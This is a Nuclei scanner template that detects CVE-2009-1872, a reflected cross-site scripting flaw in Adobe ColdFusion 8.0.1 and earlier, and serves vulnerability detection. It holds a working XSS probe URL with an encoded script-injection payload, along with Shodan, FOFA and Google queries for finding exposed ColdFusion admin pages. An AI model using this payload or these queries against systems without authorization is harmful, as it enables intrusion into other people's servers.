nuclei-templates/http/cves/2009/CVE-2009-1872.yaml

62 lines
2.5 KiB
YAML

id: CVE-2009-1872
info:
name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
author: princechaddha
severity: medium
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.
reference:
- https://www.tenable.com/cve/CVE-2009-1872
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
- http://www.dsecrg.com/pages/vul/show.php?id=122
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2009-1872
cwe-id: CWE-79
epss-score: 0.37553
epss-percentile: 0.97102
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: adobe
product: coldfusion
shodan-query:
- http.component:"Adobe ColdFusion"
- http.component:"adobe coldfusion"
- http.title:"coldfusion administrator login"
- cpe:"cpe:2.3:a:adobe:coldfusion"
fofa-query:
- title="coldfusion administrator login"
- app="adobe-coldfusion"
google-query: intitle:"coldfusion administrator login"
tags: cve2009,cve,adobe,xss,coldfusion,tenable
http:
- method: GET
path:
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502203366821ed2b22b2b05bab6a493a7c7c5db231fd6a6d80f9202908b447721a0b3022100dcfc043de885b54179a0e02dfbb7a4e986a33db1f9ef2f0cbd346b21ba783e65:922c64590222798bb761d5b6d8e72950